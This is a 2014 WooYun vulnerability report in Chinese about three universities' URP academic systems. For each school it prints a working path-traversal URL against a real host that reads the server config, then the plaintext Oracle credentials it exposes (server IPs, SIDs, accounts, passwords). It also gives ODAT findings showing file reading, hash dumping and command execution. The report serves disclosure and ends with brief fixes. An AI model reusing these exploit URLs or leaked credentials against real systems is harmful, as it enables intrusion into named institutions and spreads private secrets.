漏洞概要
关注数(24)
关注此漏洞
漏洞标题:多所大学Oracle密码泄露并暴露外网
提交时间:2014-08-19 12:58
修复时间:2014-08-24 13:00
公开时间:2014-08-24 13:00
漏洞类型:重要敏感信息泄露
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理
Tags标签:
无
漏洞详情
披露状态:
2014-08-19: 细节已通知厂商并且等待厂商处理中
2014-08-24: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
配置文件读取密码,外网成功连接,并用ODAT测试了一下
详细说明:
青岛理工大学:
发现:URP教务系统文件读取漏洞
读取地址:
http://211.64.192.44:8080/servlet/com.runqian.base.util.ReadJavaScriptServlet?file=../../../../../../../conf/resin.conf
========================================================
读取到:
Server:211.64.192.42
Sid:JW
Accout:newjw
Password:qtechedu001newjw
外网居然可以连接,图片wooyun传不上,Oracle sql handler连接上的图片就不传了。
用ODAT测试一下可用功能和账号与密码相同的账号:
ODAT连接测试结果作为漏洞证明。
ODAT:
ODAT测试结果:无账号与密码相同的账号
可读文件,获得hash密码,执行命令,扫描端口等
漏洞证明:
太原理工大学:
发现:URP教务系统文件读取漏洞
读取地址:
http://jwcurp.tyut.edu.cn:8064/servlet/com.runqian.base.util.ReadJavaScriptServlet?file=../../../../../../../conf/resin.conf
========================================================
读取到:
Server:202.207.247.43
Sid:orcl
Accout:newjw
Password:tyut2013newjwgwJWC
外网居然可以连接,图片wooyun传不上,Oracle sql handler连接上的图片就不传了。
ODAT连接测试结果作为漏洞证明。
ODAT:
ODAT测试结果:无账号与密码相同的账号
可读文件
东北农业大学:
发现:URP教务系统文件读取漏洞
读取地址:
http://202.118.167.85/servlet/com.runqian.base.util.ReadJavaScriptServlet?file=../../../../../../../conf/resin.conf
========================================================
读取到:
Server:202.118.167.87
Sid:urpjw
Accout:newjw
Password:newjw
外网居然可以连接,图片wooyun传不上,Oracle sql handler连接上的图片就不传了。
ODAT连接测试结果作为漏洞证明。
ODAT:
ODAT测试结果:账号与密码相同的账号 -> {'NEWJWZD', 'WWWCJLR', 'WEB_BKS','JXPG', 'WWWBKS', 'CWSF', 'NEWJWBLOB', 'NEWJW', 'JW_ZX'}
可读文件,获得hash密码,执行命令,扫描端口等
修复方案:
修复文件读取漏洞
数据库服务器禁外网连接
另:审核小妹纸太辛苦了!
版权声明:转载请注明来源 动后河@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2014-08-24 13:00
厂商回复:
最新状态:
暂无